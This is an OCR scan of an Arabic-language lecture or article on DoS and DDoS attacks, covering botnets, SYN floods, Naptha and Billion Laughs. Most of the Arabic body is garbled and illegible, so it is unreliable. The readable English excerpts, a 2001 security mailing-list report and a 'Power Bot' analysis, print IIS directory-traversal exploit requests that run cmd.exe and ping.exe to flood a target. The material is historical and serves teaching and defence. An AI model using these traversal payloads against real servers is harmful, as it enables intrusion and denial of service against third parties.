^11 4 Jjt.uuII L-fllijj tl^judij i : 'uWi tDDoS f t^j-naill j-al jl Jo jjll jloxloil Jo (jjSj* Lgili tAJUJI ^jtajll 

(jS-aj V Sliall .(jj^kV! ^ g*^ ^ '^lUfc Jxillj j& ^jUJI .^nl j^ll Sjaxlo IRC jjo <Jj^I jill no ^jjL^l^ll S c*1Ua 

Jlai* ^ji JjI^JI jj^iJI (j* <L»IS sUSl c£-^-c- j^c. (jjSj <Gl (j* ^c. Jl Jc-) lSj^-VI 4_Jjjjall CjI j£1I ^j* l_aWI <J^b IgiUliSI 
jjSj jSj .^jUJI oajbl o£ ujUill t> VI ^1 j] (jS*j V tl^q.n^l no J^ . (JjISj J "^Ull " lO'OOO j *M 

^jjoij JJ (J j]| Igjal s-!>Uxll L>^J 6 IRC £UJ^ a *-ifla] I Jaj .A-Ui^VI ^aj| j^ll 4_IU J 1 folio <J jj^^JI L-lau all (j-a (jjUill li& 

jll CjIjjVI fla** .L_fllUj ji l^mgi <SjJJI J^b IRC ^ J) Jj^» jll ^ uj& J u^j gH"" Jl Jj^ jll IRC ^ 

# d!a JL^ajVI aJI (j* ftjliluiVLj el ulS Trinity ^ 

4ijUll IRC r*^l J] W^LP^ J UJ^ ^^1 (JJ^H ^^1j1_J (jj-^J^ U^^W^I ' IRC J^ <UjtSll CliVU^ajVI ( ; Lll > all <1loj jS 

IRC ^1 jll j tcp/6667 aj^UVI c> Vaj) <^L3 iiUJI ^l^ki^U blto j 4 (rogue IRC servers) 

tAjjujUa jjc. ialLc Jc TCP JJ^ L5^\ L — 1 j^l c^LP^ j 'Phatbot 5Jajuit jj Ailiiill J*^. j t^^kl aJI .(aj^UJI 

6jUSl! sUa J stepping stone J^' lS^ ^jiilUJl UK J j .^ jmi I j'^ I iaUJI Jo 3 jqjq^ IRC ^ j^i Jl^ajVU ^jij ^ill j 

.IRC f fr* CjVUaSt ^UJt Jiill g-i jj 



Stepping stone IRC 
Attacker > ^ ' . , \server 




3Bo * I a bo,; e 




1 — Commanct'corYlrol traffic 

■ DoS traffic 



(MALWARE UPDATE) ^I^hj^I 

4_ill C— U>laJ ^jjjLujVI J ^Jj^jjj 4j^aLk DDoS C5^W^ -f^' J^' ^U'^*^ UJt^^^J U^J^-VI f& qia^X^.A\ ^C^ 1 C?' 

4_il^o AJI J J*-sll tdlLall (jj^ O^J 6 ^-*J^ll cJ^-^l a ^jAxII J 4_^.ll<Jl ^x»lj^)ill t?> ^ AiJaj Jj 4_SjUui ^ j; 

^JJJ f J?^^ ^1 jSI ^» CLjVVI j-aai- JjVl 1 AjII - Ikluaj U£ CjIjj^jII *bV <JVl Ikl^b . JlaJl Ajt-iflaJ td^^aall 

Jo <J a^ll 1 ^ ^ iklmJ jll L_astjJall JalAJ 1 aJJ jSJ ^ J^-jl CjIj^I (J^asU ^jV ;4Jlxi Lajb Clbaulj AjIaxII j 6^J^. jl j£I 

CjI jjVl c> ^^1 .lJjS (.> jlS US <L Jail (jjoib (jl Ja-VI V ^I^aII .<j!^Uo Jo 6 JaJjuall <jSaj j^I ^1 Vt c> 

^j-d ^1 jSVI i^VI jIa^VI (Jj^Vn cJ^S j cJS cJj^J (jl ^J^S jl ^dl jVI cJUjj] (Jj Ja (jc CjljjAaall jflj 6^ j^. j-<Jl lIjIj jill j 

.L-lJjll ^a^U. JU 6 jAj^^II 

^jjaSiil , jLjall JaLuUll Alll Alll CljUll ^I^JjojI J JxilU jjJa JJ ^lA^lfoxJl ^(p££r-tO-p€€V) ^1 (>< ^;' i ' < ^Ij^JjojI S^jj 

Phatbot ^a,<uo I 4 ^-j jVI J j .4i!j3l ^ ^jjj^UII ^ J^Uill 1 ^ iS <j| Aill nil aJI n>n c JUlJI J^f^ J^ ^Sluppcr 
jj Cjs>3I (Jj J^jII ^1 jp. ^alji^U (jj>.Vl <jl iajjll 4"(VTA5r£') ^LjUjII" J jS jijjj jill nil CjVL^jI Jo 

nil nil CjlSfxi J ^!>Uo ^iSaii ^jj-^lfoAll ^jS^j 44JVI oja ^alj^ki^b .^jjil uj^ (Gnutella caching servers) 
oja DDoS i— ASjjuj JiLc (jl clA^ nil nil djVU^I ajs jjj-«j j^-SI Jo s Jajjuoll J^ jl ^\ jSVI ^ Sjjj^. dj| jIjj^I jjuiil 

a jjll <Jo jA U-d tiliSiill J L-Jxj^a) j IjJJ^J jllSI 

(UNWITTING AGENT SCENARIO) l«J>-a- j^l *3KjM jjj^ 

SjLjall ^cxil jjII ^jxi lIjjjjj DjjjjJalLj ( . illaJJ V J^lj i^jJall Jalij ^ JJ jJJ^S 6 jfo^.1 tiljjujj jll DDoS (j - ** Uajl i^IUa 

. jjj^II <Sj^. ^a j^a ji jj* LfoLcaJ jjjjjja^ll ^VjA J ^S^jIIj ^.lfo<ill ^x»jaaj (.(Exploit) J^loaVI ^lli (j>» Vjj (jSl j 4 jl^aJI Jo 

p^jl (J^.t.1>jiVI J>»ljVI (JUjjLj ^a jll ^UjUII 6JA J^jk (jx» 4_Jjl ^!>IS jll ;^a J^-ll L " ^ J J ' J ^jilXjJall ^ idiajVI ^j-d ^Ujla ^ULaJL ^ajL ^.l^ll 



https://www.facebook.com/tibea2004 
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.(Unwitting Agent) uP j Jc o^-Jt ti^ ^ j .Ping.exe $^^31 jJl J^^i J) 

L— Lj ^ <j!>Lk ^ ^^UaVI (j^J VU^I J&\ li^aj .^Uaill Jc- Jxillj 4_iC jJoll ^IjJl Aiilil L *~ - gall ialaj - laJLuijj tSjLja ^IjJ 

( http://staff.washington.edu/dittrich/talks/first j^') u^lAP 
J <jLaLij ^ j tPing.cxc lS^*-^ p ^Lual c ^* > ^ j 1 ^ Q * lW j*-^ ^ajUJ! ciiLa^J! <jl j^ J^ 

^j-o j tLdLaJ <C jJjuu* <Lo.lk e^^. f^>\ <j 4<jjjI£juV1 CjLaaJb ^Jaa ^ J laid l—jjou] \ g j CjI <<^ft ^j-o C5"^ 

L_astjJall (J^IxJjojI <j!^L^ I^qIa^LujI ^IjujJ Jill <La,lk]| 4 A j > <a£ a J^*-!l <J^ J^l CjL&aJo J .^.5^ J J^a^a (jl jlc £A 4x- jJjuu* Cjl Ala All jJ 
* jjoj (j* (jjJjj^aL* jll j -U^aaOJ ^ j£j L_a»_jJa3l li^J (Patches) Cj Laaau^all l , JjJ-aII f <j* f>->lg ^1 <jl*J jll j 

i Jlial! " remote port-scanning tools"**-* ifl^l ^lj^ ^jj^jj^Li j^l ^!^£j3l aj^j ^jl^j V 

J NIPC's findjddos cjULJ! ^Uaj CjL^la JjjL jo l^Jc jjiuJI jSaj Vj 4 (Zombie Zapperjl RID 

^Uall (J^J^ 3 .DDoS r* JJJ^ ^J^- ^^J^ J 6 JJJ^l ^J^- ^^J**' 1 ^ax*jl ^iistjJall 

.Nessus l!^ j? ^ ^4^^ t '** 1 u ^ JalSj j L 
4 jjU 4 www.whitehouse.gov ICMP Echo Request (ping) flood c> J^jJ* ^j^J 

*ajj jj6 ^> ^^l£ jll ^ Ping (i^j ^j^il Microsoft IIS ^ ( w > ^l t ^l^kiujl ^LujI ^j^SI 1i* .2001 
Windows 2000 lS^^-^I ^ uj^ ^ t^^xjll ^2 ^Sj ^5 ^3UJI ^L^Jl ^-1^ ^ ^Jaill ^ ^jU ajs! .cAjL 

ping j .www.whitehouse.gov ■! IP u^j^ ^^1^2 j 4 ^1^ ) ^ Jaxj Ping.exe u^j^j ^ j 6 NT j 

c^U jlxJ! o^xj ja jj ^UJI JajjJJ! yi UNISOG 
I^jj U»^jc .^j^aS jjc. jll ij ^aaill djjjjjj ^ ikiLujj CjIj jA\ (j\ .I^js CjULjajill ^jia*jj ^U^ll AJjUui a ikiLujj Power bot 

.CjUL bjaSl ^.aJ Jj£ jll ^iid c <!■» > ^ Jataj j!>lstlajVI ^1 j^l JLajjU ^ajL l_a jjoj bot f 



(ATTACK PHASE) fj^t 



J ^^.Ijjj Jj^Jl ^J^- J ^aall t^a j^^l m t>^S j\\ CjLaJl» ^j-d UJ^>^ (S A ^ J Jk ^ ^'^c CjLa^JI <^ L-J>laj 

J^gJl 6^*0 AjA^J ^JJ . jxluaxll J^^^ J J^ UJ^ V ^ jl ^ ^l^ttll ^jU J^gJl J ^^klouJl ftbVI ^ JJ Jc I^UucI b L_JUJ| 

Jc ^jC d La Ijj 4 J-dlalxJl J^-jl 4"^^ (*?^ ^ ^-^>^ L>^ 4til3i ^xij . CjliLjajil! \±1 A3 CjS jll ^xi cJ^HJ g ^ 

jLlklj Ajjjailll (JjVl J^ 1 ^ U^J .Cl^ULjaji]! - ga^j Jc <sca.l^)ll 4_jAsu3I ^A5j Jc djAUI l^J^l 'Shaft 4L_jIj^V1 (J-aau 

lJ^, jllj ,UDP j 4SYN TCP <ICMP ^UL^ Jl. tf c> ^1 *^ jii^ .Shaft si J t> J jVl it jiVl 
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UNISOG E-mail Message 

Date: Fri, 04 May 2001 14:26:29 -0700 

From: Computer Security Officer <security@stanford.edu> 

To: unisog@sans.org 

Subject: [unisog] DDoS against www.whitehouse.gov 

The attack exploited vulnerable IIS5 servers on Win2K and WinNT systems. 

Immediately prior to the attack, we see an incoming port 80 connection from IP address 202.102.14.137 
(CHINANET Jiangsu province network) to each of the systems that subsequently began pinging 
198.137.240.92. The argus log looks in part like this. 



Fri 05/04 05:18:21 tcp 202.102.14.137.41406 <-> 128.12.177.11 
.80 EST 

Fri 05/04 05:18:21 tcp 202.102.14.137.41495 <-> 128.12.157.89 
.80 EST 

Fri 05/04 05:18:22 Ficmp 128.12.157.89 -> 198.137.240.92 ECO 
Fri 05/04 05:18:22 Ficmp 128.12.177.11 -> 198.137.240.92 ECO 



Each of the systems reviewed so far had two ping processes running. One of the hosts had the following in 
its IIS log file. 

12:21:36 202.102.14.137 GET /scripts/. ./../winnt/system32/ping 
.exe200 

12:29:29 202.102.14.137 GET /scripts/. ./../winnt/system32/ping 
.exe200 

While I am surprised that such a simple exploit could work, it looks like it may be exactly what happened. 

The attack was targeted at less than 2% of the total residence network population so it was probably mapped 
out earlier. ZDNet has a story running that indicated that we were not the only one used in this way. 

We are issuing an alert to our dorm network users to update their systems with the relevant security patches. 
We've been working so hard at cleaning up the Linux boxes that we've tended to ignore the Windows boxes. 
Not any more. 

Stephen 

Excerpt from "Power Bot" Analysis 

The HTTP GET request exploiting the Web server vulnerability (as seen by the ngrep utility from 
http://www.packetfactory.net/Projects/Ngrep/) and the corresponding flood traffic generated by the request: 
T 2001/06/08 02:20:09.406262 10.0.90.35:2585 -> 192.168.64.225:80 
* [AP] 

GET /scripts/.. %c 1 %9c../winnt/system32/cmd.exe?/c+ping 
^ .exe+"-v"+igmp+" 
-t"+"-l"+30000+10.2.88.84+"-n"+9999+"-w"+10.. 



4-uIa ls 2li^ 



12001/06/08 02:20:09.430676 192.168.64.225 -> 10.2.88.84 8:0 
7303 @0: 1480 

...c... 

.abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnop 
Qrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopq 

Rstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqr 

Stuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrs 

Tuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrst 

Uvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstu 

Vwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuv 

Wabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvw 

Abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwa 

Bcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwab 


The exploit is contained in the embedded Unicode characters %cl%9c, which trick the server into 
performing a directory traversal and executing a command shell /winnt/system32/cmd.exe. 



Agent 



Agent ^ qer t [^=rf Agent Agent Agent r f^^fi" Aqent Agent 

[ j=j ] ==1 |l— II Agent [j==ji Agent |l l| Agent [j=j| Agent |LJ| ==, | j=j ] 

11 "pMp w pMp" 



Agent 




Victim 



DoS iratfic 
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AjujjuJ! CAjl£i3! _4_i^jJa3l jjialo £yz L£J^ 6 C5-^-^ (J^-^ ^ La£ JJJ^ L>^ J^* ^jjH-'-m *M^J^ *j 6 ^>^ C5^J 

s jJI »<» J^a ; jj^UI p j^J! 12:00 ^ 0:00 ^1 cAl^\ J 'ci 1 ^ Jui 18:00 ^ 12:00 

^ ^jjUxi ^a (^O^ J^V^ J^A? C5^' J^-^ Cy^\ ( ^ £0*^') ■ JJJ - *^ djbjlaui JJjlj 



)oS Attacks Techniques 



6jJj£ (J^ 3 fc^UA .<Jjuij j\ fiUjaiVl (jC fi^^^ <J^ <La^aJl I J£&J .^-^^ (J^J f* I ; UjujJ Uui (J^a tilUfc 



30 M 



25 \l 




Fri Sat Sun 
Average bits in Average bits out 

botnet jW^ >>i l ^^>^ clA^ C5^j 6< -- i jj^y^ a£jjui ^joj! j (jUaj ^^Jc cjLa^JI JiL^ , >jq Vi 4 jffi ^^j^c 

.^j^JI SjS sjU jl (pay-for-hire DDoS service) lpj* ^1 

cj^iU 5 ijc V U CjU^JI .^inill Z46 sc^UnWrtt A^jj£iy\ lLL^1\ qa Z56 c^^l^l ^201 1 ^ ^ 
,LLuo (j-<i (j^j^ <^ ^'^^ j-ftiouJl ^j^ill^ APT > ^>i^Vl Jl jV .J j^ 3 ^ uj^s j 4 ^gll 4 qVi^ a ^ 
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APT = Advanced Persistent Threat 



Application 

54% 



Network 

46% 




A alia ^ Q^Lt^L ^ j^JI jjl j* ^ jj <J^1 i j» > ^ iaaa ^.Ij a*j iklujl j DDoSj DoS i— j-a <illk-<Jl ^1 jjVI t %A^aJ 

^Qj^ gaJ j^-aJ 4_x»,laJl j>» jLaj^Jl CjI j>» <ill^<J| ^| jjVI 4<Lalc ^ L^aJ /o^Astld CjUfl Jj ^ <j| Jj J;!^ ^ jllj 

"Flooding attack" cjULjajilt CjU^a j ("Semantic attack" aJV^II cjU^JI Ijajj c^^j) "vulnerability attacks" * 

.("brute-force attacks" i^Ull Sjill CjU^a Liajj ^^jj) 
^ <Jalj "vulnerability attacks" ( «» > ^ t CjU^a -i 



<JJij AJLujjl (JJJ^a jC- L_fl^Jl ,Jjl j-g j-a J til^^l^Jjuil Jj t fl^jj ;L_fl^Jl ^UaAl J djLl^ ^j;^ J cJ^- J' 6<jojLluJ| 

S 6A£jjoJI ^.jI j^. .cJ-**^ jjc. l(gU^ j ^c^l jAl jl S j^_a.VI (JlaxJ Jl J^t J 'M-^ l— IxjJa j jll CjI ASal) j* 

^ j^js 6 JUlJI Jjajuj Jc j^JI pUji l^ulaaJ j£*j Jll j ajjxj^ lJI^VI ji&l c^ill j DNS look up ^ 'jfi jljil 

^ JLuj jj (JJjia jC- JJ jJJ^l l J^*-^ Sjlcl jl Jj aLua llll ^Jajl (J^axJ JjjaxlH L-UjujJ ^ifr* 'Ping-Oj -Death (POD) 

[CERT/CC 1996a] ^OJ^ .^^j sf>* ICMP 
j* jjjc jJall (j-i ^Vim^ l jc jU j^> Jl l-s^j ^ j^l j* t" Flooding attack" > ^j^ l ciL^a -2 

j^Jfc 6<JHAl <J-1Jjuj Jc ,L_fl^i3 ^^joiJJjll ,Jjj-all ^UlLail jL^J j j^JJ ^AkJl Cjl Ala ^j-d (JjI^SI jLja^JjojU 

^jjoul L_LijJa>JI l-aaa c _ 5 ic jjujc iaLLd UDP ^jIjjuj (j-<i -^^^ cJ^jl^ $ ^ 'UDP Flooding 

.[CERT/CC 1996c] clk]^ .u^>Vl u^ii^JI Jja ^ J^jll JjIS Ui^l Jx^j jai jlLill ^ 



6 (OSI J - ^^ Clala±la llillj ^ajL c^ill JJJ^ jW^ 1 ) ^^^^ UJ^ ^A^Jl ( ; ^ jzJti Ai^JjaixJ! 4_i^jJa3l 

J gij* J tAji^i 4 r uA\ i J^lilU <lui3! jl "links" ^j^-^j11 '"ongoing communication" s j^l^ l cjVI^jVI t jjj! jll 
jl Ji^V . Jj xj^a ll ^Ikj jl (j^flaj 4i^jjoiJI A-puJall jjfL jl t^Uajlt ajI^j J .[Handley et ah 2006] ^ Jc- j^*^ 

.TCP/IP J J^JJ^ CjlLJa iiij ^ill jj jjj.a£3l 

DoS on application ^ 

ikU t_JJ Jl Cjl ^'qU tJllxJl cJ^f^ Jc- .(JJJ^^I l^A l^Jt-Q J^lxJJ jl j^-ftJ jll j <-dAaJl Cjl Ala jxi > A^Jl Jj cJ ^3^" cS^jj 

J ^5 jj^kll CjUIUI j>» ^j^^xJl ^AslSI j>» (j^axj A j^-j tilUA j jfLj i " JU3Uj ;4_j^Isl!I Jl dal Ala CjS jll jxi 4 m ^ 
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£>Ijj ^ill ^^IxJl <J-a^Jl J jij Lc,J tJ^Jl <J^J ^jSj J ^ " o clA^ piLaaJi diUlla 1^000 f ^" * J ^ 64£jJal3 AjjoljjjII 

.(cjIj^II j^) <±i\^\ J c-AL 100 Li*j^ 

La liA Jj 10 l£ ( rC* l£ JfH A ^ «j '*^ l>> lO'OOO J (^W*^ (*^^ J ^ U^J 

cjUUaH p jVl .^UJt Sj^ <> Xl 10 J gfr" J] ^Ljaj j t^ijLill J cjUUaH bOOO 

Exponential Entity Expansion Attack C5-^J extensible Markup Language (XML) parser DoS J ' 
^ Jc ^ jllj XML ^Ljj XML Jj '(Billion Laughs attack LjaJ 4ijj*Jlj) 

til^lojl Jl ^^lij -uli cXML J.:^' ; o JjL^j La^jc .[2009 lM^ j^] ^ 1 °^ J) 'g£* 1 a j ^ 

ajLlkl ^aJJ ^aJ lij ;<iI3i £-aj .4_La£L (JjajuliII ^aUaj Jc DOS Qj- ^ L>^ (L^jLoijj J^A 3 -^ (j^-aJ ^^jll 4_Lal jlall CjVL^jVI 

J> <aJ ^3 '(^]^ (_5 > JJJ*^ Jl cdiULlJ S^C-IS ^^lA 6L_13j3l 6(JliLall ^J-iJjuo (^^ic) JJ 1 ^ ^5^* ^ J 1 ^^^ 6 ^ (JjjLojI ^^ic Ajl^-J 

^jJa ^li^ll ^ S^oLoi-a]| ftj^lS ^-boaJ Cjlc^laJl ^ Jj^xJI jaJl J-a <1jU 4_La£ bj jl <ia£L ( LjjJa^ll JAj V (J^f!aj3l ^ j^A 

DoS on Operating system *k 

C-iLa^A ^IflaJ ciilli ^aj .CjlLulalS) ^^Ic A^a.^lt L-JLa^a CjI »a^J A^jLaba (JjxjooII ^Unj ^^Ic ^La^k]l L. CjLaaA 

(TCP) SYN flooding j& ^ ^ jj*-^^ ^La^JI tj->^ ^ . JJLuiill ^Uaj <-a^kll djLa^A 

s j£lMJ ^^aj .TCP ^il^a JLa^l ^all TCP SYN f>^> c> ^ lUj^ ^W^l J ^ '[CERT/CC 1996b] 

.^_J JL^j!)U TCP (J^ ^ Jjt *;\\\ ^Ltj ^ Cjllnkill ^.La^ jLj! <J ^J^JI liA Jla .^JauJall JL^sjI 

(Exploiting a Vulnerability) <-kJa!t iliS J5lii«il J_ 

tLa j-aC .^J^ > ^ J;iC. cJ^*^ ^3^^^ ^3^^ t° (-W - *^ '(J'^l^ ^Wjj^ (J^^J 'NT J WindOWS lS^*-'-' 1 ^ ^aUaj ^ Jlk lilljA 6<JllaJl 
ol^^a 4^a^lc ^-^J ^ La (J£3j t^stj^aVI U -0 (^^^ J^) C5^^ ^ <aj > ^JJ ^-jli t4 Q A^jjJa] 1^. o^u^ 4^a^^Jl (jj^J LaAjc 

jaJt ^laS ; c# itlJI ^ . C ^L^VL ^^Ixjj ^ jaJI ^ jL\ j Jjl jj ^ Ji5 .(fragmented) 

^j£-aJ L_axjJa3l I^A , jj jJJ-a£3l (JjxjujJ o^lcj jl t^JaaJ j t^jjUl ^1 J-aVl t^j^ > JJC. i^uLi a\ j^all ^3^^ '^ c ' 1 >1 ^ 

6jsu ^jojL <i jjsui oiA .(xp jj^J ^ ^ Sjaull oi^) A-i^jJall UDP ^3^- L>^ cJLujj] <!!>lijjaj| 

.newtearj 'teardrop 'boink 'bonk 

^ ^ ? t> o±&\ j J^^^ t^* 2 o-^^ J^A? Vulnerability attacks 

(ATTACKING A PROTOCOL) JjSjSxtfM * 

CjLa^J ^LalxJl ^a^Lall (jin ^1 ^ l^A jjmq'n ^ jSj jjoj V jl .TCP SYN flood J JJ^^ djLa^Jb ^j-a ^Lla JUa 

.dlLa^JI L> «J t^Lkll TCP SYN lS^*JI lUj^ .^Lkllj JjyixJl ^jjj 4mKll dlLak^ ^ j^ajUill TCP ^ 

l^l^ki^l ^jja JL^ijI ^{initial sequence number) JjVl lW^I ^ <j > ^^ t ^ ^SYN f J 

JtS Ik. .(ojj^laJl CjULJI j\ t^jj^ j^LaJl ^-a J-alsdl j L^jxjII <i£-aJ ^^LiJl ^jl Clll^) ^LaJl Jj l^JLuijj ^aJJ jit CjULJI Jc jila^il 

.JjyixJI Jj^ CjUjkJI ojJ^j '(TCB) "transmission control block" JL^jVI J ^UJI u ^^^J 'SYN ^ 3^ 

^JjuaLaLill ^aflj CjLa jIslxJI jLajjIj cJ^-^^ (JjoiLouH ^aSjJ lijlx-a t^jLa^k t . ilia ^J-a ^alluJ ^Ia*^^ ^-^jj 'SYN-ACK ^ ^ 

c5i3! ^LkJI Jj ACK ^ JL eJ L Jjy^J! . JL^jV! ^ ^SYN-ACK <-a> ^ 6L ^ 1 -f^ <Jj^ 
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Client 



Server 



Sy N 



Allocate TCB 



Allocate TCB 




jjij AAk < SYN- ACK *J TCB j^ 1 L*^c . jfL* cjSj ^ ^UJI ^jl ja j^j. ^ ^ii^vi 

^ <J!)tk ^j^k-<J! 4_^.Lai^ ^jc ^tj^Vlj ^(JIj^jVI Jplc-L ^LkJI ^jIj ^1^1 (RST 4-^3^ J^j) i3$J^ o^) 

ftjStil! iilLaij <c jjaij CjUiyi £>i& .lAj^J! j>i^q IP ^l^klajU 3^ jSLg ( L^aj ^ ^jAxJI Jjj ^l^xJI <TCP SYN L - ^ ^ 1 



j^ii c^l jSl SjIc ("n.Vit TCP ^VU^il .t*Ui <> JS! jll JU^jV! CjUIL ^ aj! Jjii V ^UJIj 4^iU] TCB 

(j-d . .^aVrtt <Lla JJC. <iI3i L_fl!^-k ^J^J ^aJJ jl ;<Jj£li ^| J^J '^-^-^ ? ^ (Jla*J tSj^U CjVI^. ^ .C£^>^ ^- c 'JJ J ^ ui ^VIj^jU (J^iLaaJ 
&J-a) > ^all oL^J SYN ^3^ L>* J-ftlaui jUj jJ ^*>1 g a\\ j^^Jl S^all d£j^<Jl (j^^xJl 4aL.h<i ^^ic -lali^Jl <J^.I 

.(TCP djtjj^lt ^L^VI jl <V<i 4-ki.»l jj Ujjj^j ^3 ^1 jjt 
^il<u3! > uj I g l£ iqj Vj t<c j^jjuixJI SYN Cy* ^i^i ^ j-" ^ 1 ^ ^ j ^j^>*jj a ^ 

^Ixluj <Cjjjab<Jl ^^>^- L . V"V TCP SYN L - d ^ 1 ^ ^ cJ^^-*^^ clA^ a *^J^ o^ls ^ jJ V .Alm^Jlj jjoJI 

6 Jjir > ^ ^Ld^Jl jUj JjJ ^aJ ,4_l^jJa3l C5 ic ^ TCP \. vW *^ * ^ TCP SYN ( ** & ^ 1 f (j-d 

'TCP SYN ( - ^ ^ 1 ^ C5^>^^ a ^ ' .4_i^jJa3! ^jl j-<J (Jl*i -lajj 1 g i£ <Lj AijSJl ^3^^ L>^ *^J J ^ lC ' L>^ ^ 

iaUx cJj^j SYN TCP e> c> ^ ^ ^V 31 ■ JSl j 'random port TCP SYN flooding 



SYN cjULj^ ^ lUUI^ TCP SYN cookies ' ^ .iK^ll lUj j+ja1\ c^jZji jjJ3 ^1 ^l^la.VI <<L13 

t JL^jVI <JU J^j 'SYN ^ULjaja l^i^ajj ^ jlj-^t ^ Bind View ^ RAZOR c^j^ c> Nomad 

cjVU^jVI t> jjiSlI Jj^nn ^ <^ jLauJI ^l^JI C5^^ .JjjjSII TCB J J^jVI c j& 

<!l .TCP API L>^ <J^aji o ^3^" f ^ J 4_^d^)J daJ C5^^J J 3 ^ TCB Sj^li ~\ iklLuji (jj^ I^jujJjojIj ^aJ ^^jll 

C> ^ .TCB (_>aj^»i>J V JjSjII 

t Jliall Jjauj (^Ic .JjiiaiJl ^gi ^ujaJI (jl <jauJa]l ^sjjjj TCP <_>"'j j^*- 4 4j»jja3l j-o ^Tn.nj JjS jll .[header flags) 
ACK ^> J-j^ J ^ Ail OjSjII .540ACK ^jj 1232 SEQ ^jf SYN-ACK > ti-jl lij 
j^; i^kaJ ja^l >J (^«3I r ua-j .V ^W-lt 'TCBs ^1 u 1 c> .ACK 1233 j SEQ 540 f 
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s ^ &1I <da j3! (jUaj ^ jIa. dVU^VI (J*?*.? V ^— ^ ; ^ ^ iali^il < . u^Lujj *u£1j ^LgL^. TCP dVU^il ^ixJch ^jL ^\ $ &1I 

.stack SYN flooding protections J-^VI ^j^b ^ ^ J^u J\ jSaj <j| . JjjjSII ^jl^* jj^ Vj J^Jl 

JUi ^la^ ^TCP SYN cookies j 'Naptha attack fj^l ^ cs^j 

(j-a (S ^ clA^ O^-f^ ^ m a dV j£ jJ JJJ ^ (JjuaULall Jynl ill I ^a^c t V^lun ^^jII <J j£ jj jjJI dLaaJb ^j^tM 

j& (J j£ jJjJJ dl .LJa J-**^ jft ^^^L^VI tUi m A naLaJI iOjl j-g ( . ll^J 4il <JJ^ ^ ;^LJ| ^ ^jl j-a till^JjoaJj <Ja*H 

,^LJl ^1L^ ^ djlilill Qli (j jljJ l£^I <J J-^JJ^ 1 ^ 

(Attacking Middleware) ia^jit *k 
jjjL ^ .Ai^V JU^I l£1 yr^^ i> ^ U^W^ *^ hash functions jjLp^ dU^JI *l j^j 

l^ijUaj s-bl J^nlajll ( . UjolJ (jl a^I g all 'bllCket (J^ (J^-&^ £J A "> J^- ' J^*^ J^ 3 ^ CS"^ 

j ^I^JjojI t . UjujJ ^jl (j£-oJ 4<JJ2kJ (J^lgJl ^^lla J ^ L_ax_jJall Jalfij aIa^J uAj 1 (p^lt » ^ ^alj diljUJl cJ^j] ^ O^-^ UJUa 

/ flxjjaH aJI jV (fniddlewarc) a » " jl^ (^0) J') J^*^ l^^ 3 (>< ^ cl^ ^ ^ l uj 1 ^^'^ a ^ ^ 4_i^jja3l 
^Jc. J jj^a^Jl jUaiiVl ^^i^ ^ ajl^jJoW Jja ^ jniriti <Lla (jj^j V ^ (jniddlcwarc) ^ > u j3l '^-^5 uj-^ ^ 

.AliSaJ 4_kjjuj jll ^^Ic ^usu ^1 djU^kll tilti Vj tj^HaVl JSLaaII ^ ^1 j^JJ V ^ j^l ^ kj > » jll D^ixJl Ja^V 

^jxi JJS tilLlA (jj^J ^JJ '^J^ 1 ^ cJ^^ t * a J 1 ^ (^5-^ 4_L^ dlli jjc. (_^^>^.l CjU»^.j toAsujjaixi (jj^J ^ lAlito ^^jII ^^^Jl 

(Attacking A Resource) ■Ulj^l 

cJ*^ (*^l AaIaJ! ^jc o^jI^II jiill cj|jLaa>i jja jjj Ual^i^. (DNS) e-^-^V! ^^1 jj^ilil <c jjoij dia jjujjj£jU» 

overprovisioning 6 ^ jj^^ a* cJ^» ^jl ^1 ^-j^ dl£jj^l3 ajjouIUj jSi ^ ^ ^n^lun ^1^31 i<j j±\ 'e>j* ttilli ^ j 

4_i^U3l (i^fkiil I jlrk Jj^j V ^ ^l^>*^ dU^kll (jjjijj 

^dujJjVI (j^-^ AjljojIj CjlcUaS C5 ic CjIjjjIj l^J (jj^J (jl O^aJ fSJ^"" (>< ^ C-H 3 ^ cJ^^ ^l^> c_fll^Al Ajj^jII ^LnJl ^jl 

Jail^jj ;S j^j SjSil ,*L<»^JI t . La a CA A'sb (j-<» ^^^^ UJ^ clA^ C5^^ 4.iuUJ^)3l A-jlaall 4_nJl j& J^jl^l 

(JLujjI (jt£-a ^•^J ^^-Sc ^cLoij ^^1 Jjl^aJl 6^-^-l 0£ ^—^J^V^ a< "- ^ cJ^-^- cl>^ dl jLulaII J j^. dU» jIslxJI J^Uj 

.aJUII yA\ JLojjVI jllx ^^i] J j^-JI OjUjILojIj ^a j5J l^-jli 6^)J jl^)3l jl^J *L<i^aJl (J^.,Xj Lo£ _^a^^Jl 
dV jJ J^)J1 J jlj^l *^ dUUiaja ^Jj AiLjaVU ,*L<i^iJl ^ (jLdj^Jl ( . UjolI] Jj^la]! (j-d ^jAslSU 1 (gl^^l g ^ <jlaall A_ilJl £>i& 

D^i^. jll A-ia a Jill g.1 U^Nfi Clijou] _4^^J| ^jUij^i] l^J!)lijjuj| (j^J ^^1 <Lola A\ L_astjJall Jalaj t alia ^ l^J^ dLd jlstxJl J^Lii] ^Ld^jjoixJl 
m a^\ * A\ (Jj3 £y± \ * *\ iklLujI ^LaaJ (jl (j^J C5^^J ^ wJ^" L - J ^ J^JJ^^ (" J a 1 ^ (J^ajlj^a^Jl Lxiajl (j^lj tdV jJjjill (>< ^ SAllaJ 

^\ ^j^JI cJ^jV 6 *ll cJ^a (j>» AjUuIsu ^l^cl ^alj (jl (j£-<uJI (j>i jjjljll . U^l jjj^j^ J*^- jl ^-j^l dVl-^V 
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4_jIa^J Jjjlall (JjJafll ^-^V j-aloi-a Cj j^kJl j-a AjAxIIj ;CjIa^JI oAA 4-g.^.l La Aa. Jl 4_llxill L-LilLoiVI j-a ^Ac <ilU& l^jLa jl*-* 

Ajjj^ll 4_iiiS| aAA 

